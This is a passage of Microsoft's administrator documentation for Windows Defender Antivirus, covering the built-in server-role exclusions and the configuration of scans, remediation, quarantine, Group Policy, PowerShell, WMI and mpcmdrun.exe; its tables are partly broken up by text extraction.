HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
%windir%\Ntds\Temp.edb
%windir%\Ntds\Edb.chk
Process exclusions for AD DS and AD DS -related support files:
%systemroot%\System32\ntfrs.exe
%systemroot%\System32\lsass.exe
DHCP Server exclusions
This section lists the exclusions that are delivered automatically when you install the DHCP Server role. The
DHCP Server file locations are specified by the DatabasePath, DhcpLogFilePath, and BackupDatabasePath
parameters in the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters
%systemroot%\System32\DHCP\*\*.mdb
%systemroot%\System32\DHCP\*\*.pat
%systemroot%\System32\DHCP\*\*.log
%systemroot%\System32\DHCP\*\*.chk
%systemroot%\System32\DHCP\*\*.edb
DNS Server exclusions
This section lists the file and folder exclusions and the process exclusions that are delivered automatically when
you install the DNS Server role.
File and folder exclusions for the DNS Server role:
%systemroot%\System32\Dns\*\*.log
%systemroot%\System32\Dns\*\*.dns
%systemroot%\System32\Dns\*\*.scc
%systemroot%\System32\Dns\*\BOOT
Process exclusions for the DNS Server role:
%systemroot%\System32\dns.exe
File and Storage Services exclusions
This section lists the file and folder exclusions that are delivered automatically when you install the File and
Storage Services role. The exclusions listed below do not include exclusions for the Clustering role.
%SystemDrive%\ClusterStorage
%clusterserviceaccount%\Local Settings\Temp
%SystemDrive%\mscs
Print Server exclusions
This section lists the file type exclusions, folder exclusions, and the process exclusions that are delivered
automatically when you install the Print Server role.
*.shd
*.spl
Folder exclusions. This folder is specified in the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory
%system32%\spool\printers\*
Process exclusions:
spoolsv.exe
Web Server exclusions
This section lists the folder exclusions and the process exclusions that are delivered automatically when you
install the Web Server role.
Folder exclusions:
%SystemRoot%\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files
%SystemDrive%\inetpub\temp\ASP Compiled Templates
%systemDrive%\inetpub\logs
%systemDrive%\inetpub\wwwroot
Process exclusions:
%SystemRoot%\system32\inetsrv\w3wp.exe
%SystemRoot%\SysWOW64\inetsrv\w3wp.exe
%SystemDrive%\PHP5433\php-cgi.exe
Windows Server Update Services exclusions
This section lists the folder exclusions that are delivered automatically when you install the Windows Server
Update Services (WSUS ) role. The WSUS folder is specified in the registry key
HKEY_LOCAL_MACHINE\Software\Microsoft\Update Services\Server\Setup
%systemroot%\WSUS\WSUSContent
%systemroot%\WSUS\UpdateServicesDBFiles
%systemroot%\SoftwareDistribution\Datastore
%systemroot%\SoftwareDistribution\Download
Related topics
Configure and validate exclusions for Windows Defender Antivirus scans
Applies to:
Use Microsoft Intune to configure scanning options
Use Configuration Manager to configure scanning options:
See How to create and deploy antimalware policies: Scan settings for details on configuring System Center Configuration
Use Group Policy to configure scanning options
To configure the Group Policy settings described in the following table:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group
Policy Object you want to configure and click Edit.
3. Expand the tree to Windows components > Windows Defender Antivirus and then the Location specified in
the table below.
4. Double-click the policy Setting as specified in the table below, and set the option to your desired configuration. Click
OK, and repeat for any other settings.
See Email scanning limitations) Scan > Turn on e-mail Disabled -DisableEmailScanning
below scanning
Scan reparse points Scan > Turn on reparse point Disabled Not available
scanning
Scan mapped network drives Scan > Run full scan on Disabled -
mapped network drives DisableScanningMappedNetworkDrivesForFullS
Scan archive files (such as .zip Scan > Scan archive files Enabled -DisableArchiveScanning
or .rar files). The extensions
exclusion list will take
precedence over this setting.
Scan files on the network Scan > Scan network files Disabled -
DisableScanningNetworkFiles
Scan packed executables Scan > Scan packed Enabled Not available
executables
Scan removable drives during Scan > Scan removable drives Disabled -
full scans only DisableRemovableDriveScanning
Specify the level of subfolders Scan > Specify the maximum 0 Not available
within an archive folder to scan depth to scan archive files
Specify the maximum CPU load Scan > Specify the maximum 50 -ScanAvgCPULoadFactor
(as a percentage) during a percentage of CPU utilization
scan. Note: This is not a hard during a scan
limit but rather a guidance for
the scanning engine to not
exceed this maximum on
average.
Specify the maximum size (in Scan > Specify the maximum No limit Not available
kilobytes) of archive files that size of archive files to be
should be scanned. The default, scanned
0, applies no limit
Configure low CPU priority for Scan > Configure low CPU Disabled Not available
scheduled scans priority for scheduled scans
NOTE
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope includes all files,
including those on mounted removable devices such as USB drives.
Use PowerShell to configure scanning options

See Manage Windows Defender Antivirus with PowerShell cmdlets and Defender cmdlets for more information on how to
Use WMI to configure scanning options
For using WMI classes, see Windows Defender WMIv2 APIs.
Email scanning limitations
We recommend using always-on real-time protection to protect against email-based malware.
Always-on protection scans emails as they arrive and as they are manipulated, just like normal files in the operating system.
This provides the strongest form of protection and is the recommended setting for scanning emails.
You can also use this Group Policy to enable scanning of older email files used by Outlook 2003 and older during on-
demand and scheduled scans. Embedded objects within an email file (such as attachments and archived files) are also
scanned. The following file format types can be scanned and remediated:
DBX
MBX
MIME
PST files used by Outlook 2003 or older (where the archive type is set to non-unicode) can also be scanned, but Windows
Defender cannot remediate threats detected inside PST files. This is another reason why we recommend using always-on
real-time protection to protect against email-based malware.
If Windows Defender Antivirus detects a threat inside an email, it will show you the following information to assist you in
identifying the compromised email, so you can remediate the threat:
Email subject
Attachment name
WARNING
There are some risks associated with scanning some Microsoft Outlook files and email messages. You can read about tips and risks
associated with scanning Outlook files and email messages in the following articles:
Scanning Outlook files in Outlook 2013
Scanning email messages in Outlook 2013
Related topics
Configure remediation for Windows Defender
Antivirus scans
Applies to:
When Windows Defender Antivirus runs a scan, it will attempt to remediate or remove threats that it finds.
You can configure how Windows Defender Antivirus should react to certain threats, whether it should create a
restore point before remediating, and when it should remove remediated threats.
This topic describes how to configure these settings with Group Policy, but you can also use System Center
Configuration Manager and Microsoft Intune.
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI class to configure these
settings.
Configure remediation options

You can configure how remediation works with the Group Policy settings described in this section.
templates.

Scan Create a system restore A system restore point will Disabled

point be created each day before
cleaning or scanning is
attempted
Scan Turn on removal of items Specify how many days 30 days

from scan history folder items should be kept in the
scan history
Root Turn off routine You can specify whether Disabled (threats are
remediation Windows Defender remediated automatically)
Antivirus automatically
remediates threats, or if it
should ask the endpoint
user what to do.
Quarantine Configure removal of items Specify how many days Never removed
from Quarantine folder items should be kept in
quarantine before being
removed
Threats Specify threat alert levels at Every threat that is Not applicable
which default action should detected by Windows
not be taken when Defender Antivirus is
detected assigned a threat level (low,
medium, high, or severe).
You can use this setting to
define how all threats for
each of the threat levels
should be remediated
(quarantined, removed, or
ignored)
Threats Specify threats upon which Specify how specific threats Not applicable
default action should not (using their threat ID)
be taken when detected should be remediated. You
can specify whether the
specific threat should be
quarantined, removed, or
ignored
IMPORTANT
Windows Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation
requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to
ensure all additional remediation steps have been completed.
If you are certain Windows Defender Antivirus quarantined a file based on a false positive, you can restore the file from
quarantine after the device reboots. See Restore quarantined files in Windows Defender Antivirus.
To avoid this problem in the future, you can exclude files from the scans. See Configure and validate exclusions for
Windows Defender Antivirus scans.
Also see Configure remediation-required scheduled full Windows Defender Antivirus scans for more
remediation-related settings.
Related topics
Configure the notifications that appear on endpoints
Configure end-user Windows Defender Antivirus interaction
Configure scheduled quick or full Windows
Applies to:
NOTE
By default, Windows Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans.
You can Manage the schedule for when protection updates should be downloaded and applied to override this
default.
In addition to always-on real-time protection and on-demand scans, you can set up regular, scheduled
scans.
You can configure the type of scan, when the scan should occur, and if the scan should occur after a
protection update or if the endpoint is being used. You can also specify when special scans to complete
remediation should occur.
This topic describes how to configure scheduled scans with Group Policy, PowerShell cmdlets, and WMI.
You can also configure schedules scans with System Center Configuration Manager or Microsoft Intune.
To configure the Group Policy settings described in this topic:
1. On your Group Policy management machine, open the Group Policy Management Console, right-
4. Expand the tree to Windows components > Windows Defender Antivirus and then the
Location specified in the table below.
Also see the Manage when protection updates should be downloaded and applied and Prevent or allow
users to locally modify policy settings topics.
Quick scan versus full scan and custom scan

When you set up scheduled scans, you can set up whether the scan should be a full or quick scan.
Quick scans look at all the locations where there could be malware registered to start with the system,
such as registry keys and known Windows startup folders.
Combined with always-on real-time protection capability - which reviews files when they are opened and
closed, and whenever a user navigates to a folder - a quick scan helps provide strong coverage both for
malware that starts with the system and kernel-level malware.
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any
inactive components that require a more thorough clean-up. In this instance, you may want to use a full
scan when running an on-demand scan.
A custom scan allows you to specify the files and folders to scan, such as a USB drive.
NOTE
Set up scheduled scans

Scheduled scans will run at the day and time you specify. You can use Group Policy, PowerShell, and WMI
to configure scheduled scans.
NOTE
If a computer is unplugged and running on battery during a scheduled full scan, the scheduled scan will stop with
event 1002, which states that the scan stopped before completion. Windows Defender Antivirus will run a full scan
at the next scheduled time.
Use Group Policy to schedule scans:

Scan Specify the scan type to Quick scan

use for a scheduled scan
Scan Specify the day of the Specify the day (or never) Never
week to run a scheduled to run a scan.
scan
Scan Specify the time of day to Specify the number of 2 am

run a scheduled scan minutes after midnight
(for example, enter 60 for
1 am).
Root Randomize scheduled task In Windows Defender Enabled

times Antivirus: Randomize the
start time of the scan to
any interval from 0 to 4
hours.
In FEP/SCEP: randomize to
any interval plus or minus
30 minutes. This can be
useful in VM or VDI
deployments.
Use PowerShell cmdlets to schedule scans:

Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instruction (WMI ) to schedule scans:

Start scheduled scans only when the endpoint is not in use

You can set the scheduled scan to only occur when the endpoint is turned on but not in use with Group
Policy, PowerShell, or WMI.
Use Group Policy to schedule scans

Scan Start the scheduled scan Scheduled scans will not Enabled
only when computer is on run, unless the computer
but not in use is on but not in use

Set-MpPreference -ScanOnlyIfIdleEnabled

Configure when full scans should be run to complete remediation

Some threats may require a full scan to complete their removal and remediation. You can schedule when
these scans should occur with Group Policy, PowerShell, or WMI.
Use Group Policy to schedule remediation-required scans

Remediation Specify the day of the Specify the day (or never) Never
week to run a scheduled to run a scan.
full scan to complete
remediation
Remediation Specify the time of day to Specify the number of 2 am

run a scheduled full scan minutes after midnight
to complete remediation (for example, enter 60 for
1 am)

Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime

Set up daily quick scans

You can enable a daily quick scan that can be run in addition to your other scheduled scans with Group
Policy, PowerShell, or WMI.
Use Group Policy to schedule daily scans:

Scan Specify the interval to run Specify how many hours Never
quick scans per day should elapse before the
next quick scan. For
example, to run every two
hours, enter 2, for once a
day, enter 24. Enter 0 to
never run a daily quick
scan.
Scan Specify the time for a daily Specify the number of 2 am

quick scan minutes after midnight
(for example, enter 60 for
1 am)
Use PowerShell cmdlets to schedule daily scans:

Set-MpPreference -ScanScheduleQuickTime
Use Windows Management Instruction (WMI ) to schedule daily scans:

Enable scans after protection updates

You can force a scan to occur after every protection update with Group Policy.
Use Group Policy to schedule scans after protection updates

Signature updates Turn on scan after A scan will occur Enabled

Security intelligence immediately after a new
update protection update is
downloaded
Related topics
Prevent or allow users to locally modify policy settings
Configure and run on-demand Windows Defender
Antivirus scans
Applies to:
You can run an on-demand scan on individual endpoints. These scans will start immediately, and you can
define parameters for the scan, such as the location or type.
Quick scan versus full scan

Quick scan looks at all the locations where there could be malware registered to start with the system, such
as registry keys and known Windows startup folders.
Combined with always-on real-time protection capability--which reviews files when they are opened and
closed, and whenever a user navigates to a folder--a quick scan helps provide strong coverage both for
malware that starts with the system and kernel-level malware.
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any
inactive components that require a more thorough clean-up, and can be ideal when running on-demand
scans.
NOTE
Use Configuration Manager to run a scan:

See Antimalware and firewall tasks: How to perform an on-demand scan for details on using System Center
Configuration Manager (current branch) to run a scan.
Use the mpcmdrum.exe command-line utility to run a scan:
Use the following -scan parameter:
mpcmdrun.exe -scan -scantype 1
See Use the mpcmdrun.exe commandline tool to configure and manage Windows Defender Antivirus for
more information on how to use the tool and additional parameters, including starting a full scan or defining
paths.
Use Microsoft Intune to run a scan:
2. Select ...More and then select Quick Scan or Full Scan.
Use the Windows Security app to run a scan:
See Run a scan in the Windows Security app for instructions on running a scan on individual endpoints.
Use PowerShell cmdlets to run a scan:
Start-MpScan
Use Windows Management Instruction (WMI ) to run a scan:
Use the Start method of the MSFT_MpScan class.
Related topics
Review Windows Defender Antivirus scan results
Applies to:
After an Windows Defender Antivirus scan completes, whether it is an on-demand or scheduled scan, the results
are recorded and you can view the results.
Use Microsoft Intune to review scan results:
2. Click the scan results in Device actions status.
Use Configuration Manager to review scan results:
See How to monitor Endpoint Protection status.
Use the Windows Security app to review scan results:
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan
history label.
Click See full history for any of the sections to see previous detections and the action taken. You can
also clear the list.
Information about the last scan is displayed at the bottom of the page.
Use PowerShell cmdlets to review scan results:
The following cmdlet will return each detection on the endpoint. If there are multiple detections of the same
threat, each detection will be listed separately, based on the time of each detection:
Get-MpThreatDetection
You can specify -ThreatID to limit the output to only show the detections for a specific threat.
If you want to list threat detections, but combine detections of the same threat into a single item, you can use the
following cmdlet:
Get-MpThreat
Use Windows Management Instruction (WMI ) to review scan results:
Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
Related topics
Run and review the results of a Windows Defender
Offline scan
Applies to:
Windows Defender Offline is an antimalware scanning tool that lets you boot and run a scan from a trusted
environment. The scan runs from outside the normal Windows kernel so it can target malware that attempts to
bypass the Windows shell, such as viruses and rootkits that infect or overwrite the master boot record (MBR ).
You can use Windows Defender Offline if you suspect a malware infection, or you want to confirm a thorough
clean of the endpoint after a malware outbreak.
In Windows 10, Windows Defender Offline can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Windows Defender Offline to bootable media, restart the
endpoint, and load the bootable media.
Pre-requisites and requirements

Windows Defender Offline in Windows 10 has the same hardware requirements as Windows 10.
For more information about Windows 10 requirements, see the following topics:
NOTE
Windows Defender Offline is not supported on machines with ARM processors, or on Windows Server Stock Keeping Units.
To run Windows Defender Offline from the endpoint, the user must be logged in with administrator privileges.
Windows Defender Offline updates

Windows Defender Offline uses the most recent protection updates available on the endpoint; it's updated
whenever Windows Defender Antivirus is updated.
NOTE
Before running an offline scan, you should attempt to update Windows Defender AV protection. You can either force an
update with Group Policy or however you normally deploy updates to endpoints, or you can manually download and install
the latest protection updates from the Microsoft Malware Protection Center.
See the Manage Windows Defender Antivirus Security intelligence updates topic for more information.
Usage scenarios
In Windows 10, version 1607, you can manually force an offline scan. Alternatively, if Windows Defender
determines that Windows Defender Offline needs to run, it will prompt the user on the endpoint.
The need to perform an offline scan will also be revealed in System Center Configuration Manager if you're using
it to manage your endpoints.
The prompt can occur via a notification, similar to the following:
The user will also be notified within the Windows Defender client:
In Configuration Manager, you can identify the status of endpoints by navigating to Monitoring > Overview >
Security > Endpoint Protection Status > System Center Endpoint Protection Status.
Windows Defender Offline scans are indicated under Malware remediation status as Offline scan required.
Configure notifications
Windows Defender Offline notifications are configured in the same policy setting as other Windows Defender AV
notifications.
For more information about notifications in Windows Defender, see the Configure the notifications that appear on
endpoints topic.
Run a scan
IMPORTANT
Before you use Windows Defender Offline, make sure you save any files and shut down running programs. The Windows
Defender Offline scan takes about 15 minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment. The user interface will appear different to a normal scan
performed by Windows Defender. After the scan is completed, the endpoint will be restarted and Windows will load normally.
You can run a Windows Defender Offline scan with the following:
PowerShell
Use PowerShell cmdlets to run an offline scan:
Start-MpWDOScan
Use Windows Management Instruction (WMI ) to run an offline scan:
Use the MSFT_MpWDOScan class to run an offline scan.
The following WMI script snippet will immediately run a Windows Defender Offline scan, which will cause the
endpoint to restart, run the offline scan, and then restart and boot into Windows.
wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start

Use the Windows Defender Security app to run an offline scan:
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Advanced
scan label:
3. Select Windows Defender Offline scan and click Scan now.
NOTE
In Windows 10, version 1607, the offline scan could be run from under Windows Settings > Update & security >
Windows Defender or from the Windows Defender client.
Review scan results

Windows Defender Offline scan results will be listed in the Scan history section of the Windows Security app.
Related topics
Restore quarantined files in Windows Defender AV
Applies to:
If Windows Defender Antivirus is configured to detect and remediate threats on your device, Windows Defender
Antivirus quarantines suspicious files. If you are certain these files do not present a threat, you can restore them.
1. Open Windows Security.
2. Click Virus & threat protection and then click Threat History.
3. Under Quarantined threats, click See full history.
4. Click an item you want to keep, then click Restore. (If you prefer to remove the item, you can click Remove.)
Related topics
Review scan results
Manage Windows Defender Antivirus in your
business
Applies to:
You can manage and configure Windows Defender Antivirus with the following tools:
Microsoft Intune
Group Policy
PowerShell cmdlets
Windows Management Instruction (WMI)
The mpcmdrun.exe utility
The topics in this section provide further information, links, and resources for using these tools to manage and
configure Windows Defender Antivirus.
In this section
TOPIC DESCRIPTION
Manage Windows Defender Antivirus with Microsoft Intune Information about using Intune and System Center
and System Center Configuration Manager Configuration Manager to deploy, manage, report, and
configure Windows Defender Antivirus
Manage Windows Defender Antivirus with Group Policy List of all Group Policy settings located in ADMX templates
settings
Manage Windows Defender Antivirus with PowerShell Instructions for using PowerShell cmdlets to manage
cmdlets Windows Defender Antivirus, plus links to documentation for
all cmdlets and allowed parameters
Manage Windows Defender Antivirus with Windows Instructions for using WMI to manage Windows Defender
Management Instrumentation (WMI) Antivirus, plus links to documentation for the WMIv2 APIs
(including all classes, methods, and properties)
Manage Windows Defender Antivirus with the Instructions on using the dedicated command-line tool to
mpcmdrun.exe command-line tool manage and use Windows Defender Antivirus
Use System Center Configuration Manager and
Microsoft Intune to configure and manage Windows
Defender Antivirus
Applies to:
If you are using System Center Configuration Manager or Microsoft Intune to manage the endpoints on your
network, you can also use them to manage Windows Defender Antivirus scans.
In some cases, the protection will be labeled as Endpoint Protection, although the engine is the same as that used
by Windows Defender Antivirus.
See the Endpoint Protection library on docs.microsoft.com for information on using Configuration Manager.
For Microsoft Intune, consult the Microsoft Intune library and Configure device restriction settings in Intune.
Related topics
Use Group Policy settings to configure and manage
Applies to:
You can use Group Policy to configure and manage Windows Defender Antivirus on your endpoints.
In general, you can use the following procedure to configure or change Windows Defender Antivirus group policy
settings:
Group Policy Object (GPO ) you want to configure and click Edit.
5. Expand the section (referred to as Location in the table in this topic) that contains the setting you want to
configure, double-click the setting to open it, and make configuration changes.
The following table in this topic lists the Group Policy settings available in Windows 10, version 1703, and
provides links to the appropriate topic in this documentation library (where applicable).
Client interface Enable headless UI mode Prevent users from seeing or

interacting with the Windows Defender
Antivirus user interface
Client interface Display additional text to clients when Configure the notifications that appear
they need to perform an action on endpoints
Client interface Suppress all notifications Configure the notifications that appear
on endpoints
Client interface Suppresses reboot notifications Configure the notifications that appear
on endpoints
Exclusions Extension Exclusions Configure and validate exclusions in

Exclusions Path Exclusions Configure and validate exclusions in

Exclusions Process Exclusions Configure and validate exclusions in

Exclusions Turn off Auto Exclusions Configure and validate exclusions in

MAPS Configure the 'Block at First Sight' Enable block at first sight
feature
MAPS Join Microsoft MAPS Enable cloud-delivered protection
MAPS Send file samples when further analysis Enable cloud-delivered protection
is required
MAPS Configure local setting override for Prevent or allow users to locally modify
reporting to Microsoft MAPS policy settings
MpEngine Configure extended cloud check Configure the cloud block timeout
period
MpEngine Select cloud protection level Specify the cloud-delivered protection

level
Network inspection system Specify additional definition sets for Not used
network traffic inspection
Network inspection system Turn on definition retirement Not used
Network inspection system Turn on protocol recognition Not used
Quarantine Configure local setting override for the Prevent or allow users to locally modify
removal of items from Quarantine policy settings
folder
Quarantine Configure removal of items from Configure remediation for Windows

Quarantine folder Defender Antivirus scans
monitoring file and program activity on policy settings
your computer
monitoring for incoming and outgoing policy settings
file activity
scanning all downloaded files and policy settings
attachments
Real-time protection Configure local setting override for turn Prevent or allow users to locally modify
on behavior monitoring policy settings
Real-time protection Configure local setting override to turn Prevent or allow users to locally modify
on real-time protection policy settings
Real-time protection Define the maximum size of Enable and configure Windows
downloaded files and attachments to Defender Antivirus always-on
be scanned protection and monitoring
Real-time protection Monitor file and program activity on Enable and configure Windows
your computer Defender Antivirus always-on
Real-time protection Scan all downloaded files and Enable and configure Windows
attachments Defender Antivirus always-on
Real-time protection Turn off real-time protection Enable and configure Windows
Defender Antivirus always-on
Real-time protection Turn on behavior monitoring Enable and configure Windows

Real-time protection Turn on process scanning whenever Enable and configure Windows
real-time protection is enabled Defender Antivirus always-on
Real-time protection Turn on raw volume write notifications Enable and configure Windows
Real-time protection Configure monitoring for incoming and Enable and configure Windows
outgoing file and program activity Defender Antivirus always-on
Remediation Configure local setting override for the Prevent or allow users to locally modify
time of day to run a scheduled full scan policy settings
Remediation Specify the day of the week to run a Configure scheduled Windows
scheduled full scan to complete Defender Antivirus scans
remediation
Remediation Specify the time of day to run a Configure scheduled Windows

scheduled full scan to complete Defender Antivirus scans
remediation
Reporting Configure Watson events Not used
Reporting Configure Windows software trace Not used

preprocessor components
Reporting Configure WPP tracing level Not used

critically failed state

non-critical failed state

recently remediated state
Reporting Configure time out for detections Not used

requiring additional action
Reporting Turn off enhanced notifications Configure the notifications that appear
on endpoints
Root Turn off Windows Defender Antivirus Not used (This setting must be set to
Not configured to ensure any installed
third-party antivirus apps work
correctly)
Root Define addresses to bypass proxy Not used

server
Root Define proxy auto-config (.pac) for Not used

connecting to the network
Root Define proxy server for connecting to Not used

the network
Root Configure local administrator merge Prevent or allow users to locally modify
behavior for lists policy settings
Root Allow antimalware service to startup Configure remediation for Windows

with normal priority Defender Antivirus scans
Root Allow antimalware service to remain Configure remediation for Windows

running always Defender Antivirus scans
Root Turn off routine remediation Configure remediation for Windows

Root Randomize scheduled task times Configure scheduled scans for Windows
Defender Antivirus
Scan Allow users to pause scan Prevent users from seeing or

interacting with the Windows Defender
Antivirus user interface
Scan Check for the latest virus and spyware Manage event-based forced updates
definitions before running a scheduled
scan
Scan Define the number of days after which Manage updates for endpoints that are
a catch-up scan is forced out of date
Scan Turn on catch up full scan Manage updates for endpoints that are
out of date
Scan Turn on catch up quick scan Manage updates for endpoints that are
out of date
maximum percentage of CPU utilization policy settings
schedule scan day policy settings
scheduled quick scan time policy settings
scheduled scan time policy settings
Scan Configure local setting override for the Prevent or allow users to locally modify
scan type to use for a scheduled scan policy settings
Scan Create a system restore point Configure remediation for Windows

Scan Turn on removal of items from scan Configure remediation for Windows
history folder Defender Antivirus scans
Scan Turn on heuristics Enable and configure Windows

Scan Turn on e-mail scanning Configure scanning options in Windows

Defender Antivirus
Scan Turn on reparse point scanning Configure scanning options in Windows

Defender Antivirus
Scan Run full scan on mapped network Configure scanning options in Windows
drives Defender Antivirus
Scan Scan archive files Configure scanning options in Windows

Defender Antivirus
Scan Scan network files Configure scanning options in Windows

Defender Antivirus
Scan Scan packed executables Configure scanning options in Windows

Defender Antivirus
Scan Scan removable drives Configure scanning options in Windows

Defender Antivirus
Scan Specify the maximum depth to scan Configure scanning options in Windows
archive files Defender Antivirus
Scan Specify the maximum percentage of Configure scanning options in Windows

CPU utilization during a scan Defender Antivirus
Scan Specify the maximum size of archive Configure scanning options in Windows
files to be scanned Defender Antivirus
Scan Specify the day of the week to run a Configure scheduled scans for Windows
Scan Specify the interval to run quick scans Configure scheduled scans for Windows
per day Defender Antivirus
Scan Specify the scan type to use for a Configure scheduled scans for Windows
Scan Specify the time for a daily quick scan Configure scheduled scans for Windows
Defender Antivirus
Scan Specify the time of day to run a Configure scheduled scans for Windows
Scan Start the scheduled scan only when Configure scheduled scans for Windows
computer is on but not in use Defender Antivirus
Security intelligence updates Allow definition updates from Microsoft Manage updates for mobile devices and
Update virtual machines (VMs)
Security intelligence updates Allow definition updates when running Manage updates for mobile devices and
on battery power virtual machines (VMs)
Security intelligence updates Allow notifications to disable definitions Manage event-based forced updates
based repots to Microsoft MAPS
Security intelligence updates Allow real-time definition updates Manage event-based forced updates
based on reports to Microsoft MAPS
Security intelligence updates Check for the latest virus and spyware Manage event-based forced updates
definitions on startup
Security intelligence updates Define file shares for downloading Manage Windows Defender Antivirus
definition updates protection and definition updates
Security intelligence updates Define the number of days after which Manage updates for endpoints that are
a catch up definition update is required out of date
Security intelligence updates Define the number of days before Manage updates for endpoints that are
spyware definitions are considered out out of date
of date
Security intelligence updates Define the number of days before virus Manage updates for endpoints that are
definitions are considered out of date out of date
Security intelligence updates Define the order of sources for Manage Windows Defender Antivirus
downloading definition updates protection and definition updates
Security intelligence updates Initiate definition update on startup Manage event-based forced updates
Security intelligence updates Specify the day of the week to check for Manage when protection updates
Security intelligence updates Specify the interval to check for Manage when protection updates
Security intelligence updates Specify the time to check for definition Manage when protection updates
updates should be downloaded and applied
Security intelligence updates Turn on scan after Security intelligence Configure scheduled scans for Windows
update Defender Antivirus
Threats Specify threat alert levels at which Configure remediation for Windows
default action should not be taken Defender Antivirus scans
when detected
Threats Specify threats upon which default Configure remediation for Windows
action should not be taken when Defender Antivirus scans
detected
Related topics
Use PowerShell cmdlets to configure and
manage Windows Defender Antivirus
Applies to:
You can use PowerShell to perform various functions in Windows Defender. Similar to the command
prompt or command line, PowerShell is a task-based command-line shell and scripting language
designed especially for system administration, and you can read more about it at the PowerShell hub on
MSDN.
For a list of the cmdlets and their functions and available parameters, see the Defender cmdlets topic.
PowerShell cmdlets are most useful in Windows Server environments that don't rely on a graphical user
interface (GUI) to configure software.
NOTE
PowerShell cmdlets should not be used as a replacement for a full network policy management infrastructure,
such as System Center Configuration Manager, Group Policy Management Console, or Windows Defender
Antivirus Group Policy ADMX templates.
Changes made with PowerShell will affect local settings on the endpoint where the changes are
deployed or made. This means that deployments of policy with Group Policy, System Center
Configuration Manager, or Microsoft Intune can overwrite changes made with PowerShell.
PowerShell is typically installed under the folder %SystemRoot%\system32\WindowsPowerShell.
Use Windows Defender Antivirus PowerShell cmdlets:
1. Click Start, type powershell, and press Enter.
2. Click Windows PowerShell to open the interface.
3. Enter the command and parameters.
NOTE
You may need to open an administrator-level version of PowerShell. Right-click the item in the Start menu, click
To open online help for any of the cmdlets type the following:
Get-Help <cmdlet> -Online
Omit the -online parameter to get locally cached help.
Related topics
Use Windows Management Instrumentation (WMI)
to configure and manage Windows Defender
Antivirus
Applies to:
Windows Management Instrumentation (WMI) is a scripting interface that allows you to retrieve, modify, and
update settings.
Read more about WMI at the Microsoft Developer Network System Administration library.
Windows Defender Antivirus has a number of specific WMI classes that can be used to perform most of the same
functions as Group Policy and other management tools. Many of the classes are analogous to Defender
PowerShell cmdlets.
The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI classes for Windows
Defender Antivirus, and includes example scripts.
Changes made with WMI will affect local settings on the endpoint where the changes are deployed or made. This
means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft Intune
can overwrite changes made with WMI.
Related topics
Configure and manage Windows Defender Antivirus
with the mpcmdrun.exe command-line tool
Applies to:
You can perform various Windows Defender Antivirus functions with the dedicated command-line tool
mpcmdrun.exe.
This utility can be useful when you want to automate Windows Defender Antivirus use.
You can find the utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must run it from a
command prompt.
NOTE
You may need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click
The utility has the following commands:
MpCmdRun.exe [command] [-options]
COMMAND DESCRIPTION
-? or -h Displays all available options for this tool
-Scan [- ScanType #] [- File [- DisableRemediation] [- Scans for malicious software

BootSectorScan]] [- Timeout ] [- Cancel]
-Trace [- Grouping #] [- Level #] Starts diagnostic tracing
-GetFiles Collects support information
-GetFilesDiagTrack Same as Getfiles but outputs to temporary DiagTrack folder
-RemoveDefinitions [- All] Restores the installed Security intelligence to a previous

backup copy or to the original default set
-RemoveDefinitions [- DynamicSignatures] Removes only the dynamically downloaded Security

intelligence
-RemoveDefinitions [- Engine] Restores the previous installed engine
-SignatureUpdate [- UNC | -MMPC] Checks for new Security intelligence updates
-Restore [- ListAll | [[- Name ] [- All] | [- FilePath ]] [- Path ]] Restores or lists quarantined item(s)
COMMAND DESCRIPTION
-AddDynamicSignature [- Path] Loads dynamic Security intelligence
-ListAllDynamicSignatures Lists the loaded dynamic Security intelligence
-RemoveDynamicSignature [- SignatureSetID] Removes dynamic Security intelligence
-CheckExclusion -path Checks whether a path is excluded
Related topics
Configure the security controls in Secure score
Applies to:
Each security control lists recommendations that you can take to increase the security posture of your
organization.
Endpoint detection and response (EDR ) optimization
For an machine to be considered "well configured", it must comply to a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for your Endpoint detection and response tool.
IMPORTANT
Minimum baseline configuration setting for EDR:

Windows Defender ATP sensor is on
Data collection is working correctly
Communication to Windows Defender ATP service is not impaired
R e c o m m e n d e d a c t i o n s:
You can take the following actions to increase the overall security score of your organization:
Turn on sensor
Fix sensor data collection
Fix impaired communications
For more information, see Fix unhealthy sensors.
Windows Defender Antivirus (Windows Defender AV ) optimization
For a machine to be considered "well configured", it must comply to a minimum baseline configuration setting.
configuration setting for Windows Defender AV is fulfilled.
IMPORTANT
Minimum baseline configuration setting for Windows Defender AV:

Machines are considered "well configured" for Windows Defender AV if the following requirements are met:
Windows Defender AV is reporting correctly
Windows Defender AV is turned on
Security intelligence is up to date
